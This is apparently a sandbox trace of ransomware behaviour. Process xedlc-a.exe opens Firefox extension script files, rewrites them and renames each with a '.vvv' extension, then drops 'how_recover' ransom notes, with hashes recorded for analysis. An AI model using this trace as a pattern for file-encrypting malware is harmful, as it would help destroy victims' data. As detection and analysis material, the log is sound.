- fid (ads:): 281474976765856
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77115
- mode: close
- sequenceNumber: 1122
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js
- filesize: 5198
- md5sum: 11b2a41a38726a9c8feb214343af032e
- sha1sum: b8222cf97990fd94520117e26ba929eb9ed5152b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765856
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77128
- mode: rename
- sequenceNumber: 1123
- filesize: 5198
- md5sum: 11b2a41a38726a9c8feb214343af032e
- sha1sum: b8222cf97990fd94520117e26ba929eb9ed5152b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js.vvv
- ads:
- fid (ads:): 281474976765856
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77143
- mode: open
- sequenceNumber: 1124
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js
- filesize: 18559
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476252
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77296
- mode: close
- sequenceNumber: 1125
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js
- filesize: 18974
- md5sum: 070bb09e4b19ce4b94317fe9eab9ab7e
- sha1sum: 6dad283a2cbe5f22f44536d1800aab86b7907776
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476252
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77322
- mode: rename
- sequenceNumber: 1126
- filesize: 18974
- md5sum: 070bb09e4b19ce4b94317fe9eab9ab7e
- sha1sum: 6dad283a2cbe5f22f44536d1800aab86b7907776
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\content-proxy.js.vvv
- ads:
- fid (ads:): 562949953476252
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77341
- mode: open
- sequenceNumber: 1127
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js
- filesize: 6915
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765866
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77417
- mode: close
- sequenceNumber: 1128
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js
- filesize: 7342
- md5sum: 4b34bf233740f2725d740f763f19872a
- sha1sum: ec15cfbbc71461d0ddc0357942c15693df103987
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765866
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77443
- mode: rename
- sequenceNumber: 1129
- filesize: 7342
- md5sum: 4b34bf233740f2725d740f763f19872a
- sha1sum: ec15cfbbc71461d0ddc0357942c15693df103987
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\loader.js.vvv
- ads:
- fid (ads:): 281474976765866
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77455
- mode: open
- sequenceNumber: 1130
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js
- filesize: 6993
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765894
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77550
- mode: close
- sequenceNumber: 1131
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js
- filesize: 7422
- md5sum: 46abe7a9e7b5fe0ffff134b8641ae31a
- sha1sum: 893562d55961a160ce4713d106ac7fccb1410d4e
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765894
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77571
- mode: rename
- sequenceNumber: 1132
- filesize: 7422
- md5sum: 46abe7a9e7b5fe0ffff134b8641ae31a
- sha1sum: 893562d55961a160ce4713d106ac7fccb1410d4e
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\symbiont.js.vvv
- ads:
- fid (ads:): 281474976765894
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77583
- mode: open
- sequenceNumber: 1133
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js
- filesize: 19369
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897579
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77706
- mode: close
- sequenceNumber: 1134
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js
- filesize: 19790
- md5sum: fb36e4f6c9da0933c267ae0af3154ee4
- sha1sum: d6962ede3cf355537d5b986bd0ecb626b525dd34
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897579
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77720
- mode: rename
- sequenceNumber: 1135
- filesize: 19790
- md5sum: fb36e4f6c9da0933c267ae0af3154ee4
- sha1sum: d6962ede3cf355537d5b986bd0ecb626b525dd34
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\worker.js.vvv
- ads:
- fid (ads:): 1125899906897579
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77732
- mode: created
- sequenceNumber: 1136
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778337
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77743
- mode: close
- sequenceNumber: 1137
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778337
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77753
- mode: created
- sequenceNumber: 1138
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778338
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77763
- mode: close
- sequenceNumber: 1139
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778338
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77774
- mode: open
- sequenceNumber: 1140
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js
- filesize: 2013
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765854
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77867
- mode: close
- sequenceNumber: 1141
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js
- filesize: 2430
- md5sum: 10d3576933b6d9e975f7e9416cdf5187
- sha1sum: bea67c7952cfe564f35e7e25313ebbb87f31b7de
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765854
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77879
- mode: rename
- sequenceNumber: 1142
- filesize: 2430
- md5sum: 10d3576933b6d9e975f7e9416cdf5187
- sha1sum: bea67c7952cfe564f35e7e25313ebbb87f31b7de
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\content.js.vvv
- ads:
- fid (ads:): 281474976765854
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77891
- mode: open
- sequenceNumber: 1143
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js
- filesize: 6193
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476271
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77965
- mode: close
- sequenceNumber: 1144
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js
- filesize: 6622
- md5sum: b6ccf77967b01a964fda25000f2b3d50
- sha1sum: 4f34980b784237ccedf8e23befd4d60cd9a41030
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476271
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77978
- mode: rename
- sequenceNumber: 1145
- filesize: 6622
- md5sum: b6ccf77967b01a964fda25000f2b3d50
- sha1sum: 4f34980b784237ccedf8e23befd4d60cd9a41030
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js.vvv
- ads:
- fid (ads:): 562949953476271
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78026
- mode: open
- sequenceNumber: 1146
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js
- filesize: 6789
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765895
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78076
- mode: close
- sequenceNumber: 1147
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js
- filesize: 7214
- md5sum: b768afb4af1e34de139ec93d8838a2c2
- sha1sum: c5bb09ec199e23a122e716c90cce7c9845867d0c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765895
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78095
- mode: rename
- sequenceNumber: 1148
- filesize: 7214
- md5sum: b768afb4af1e34de139ec93d8838a2c2
- sha1sum: c5bb09ec199e23a122e716c90cce7c9845867d0c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js.vvv
- ads:
- fid (ads:): 281474976765895
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78109
- mode: open
- sequenceNumber: 1149
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js
- filesize: 3285
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765871
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78119
- mode: close
- sequenceNumber: 1150
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js
- filesize: 3710
- md5sum: 59b75d30995380b7282a509563e00d0e
- sha1sum: 00760ff5ef459a2a177885ca4edaa27e0f242815
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765871
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78131
- mode: rename
- sequenceNumber: 1151
- filesize: 3710
- md5sum: 59b75d30995380b7282a509563e00d0e
- sha1sum: 00760ff5ef459a2a177885ca4edaa27e0f242815
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js.vvv
- ads:
- fid (ads:): 281474976765871
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78143
- mode: created
- sequenceNumber: 1152
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778339
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78152
- mode: close
- sequenceNumber: 1153
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778339
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78162
- mode: created
- sequenceNumber: 1154
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778340
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78170
- mode: close
- sequenceNumber: 1155
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778340
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78179
- mode: open
- sequenceNumber: 1156
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js
- filesize: 7418
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476249
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78218
- mode: close
- sequenceNumber: 1157
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js
- filesize: 7838
- md5sum: 9cc309b952ea46cb038f3c9d53c4d319
- sha1sum: a42b43345cb33e28a231bbbb58f9349521c5352f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476249
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78240
- mode: rename
- sequenceNumber: 1158
- filesize: 7838
- md5sum: 9cc309b952ea46cb038f3c9d53c4d319
- sha1sum: a42b43345cb33e28a231bbbb58f9349521c5352f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js.vvv
- ads:
- fid (ads:): 562949953476249
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78252
- mode: created
- sequenceNumber: 1159
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778341
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78260
- mode: close
- sequenceNumber: 1160
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778341
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78276
- mode: created
- sequenceNumber: 1161
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778342
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78284
- mode: close
- sequenceNumber: 1162
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
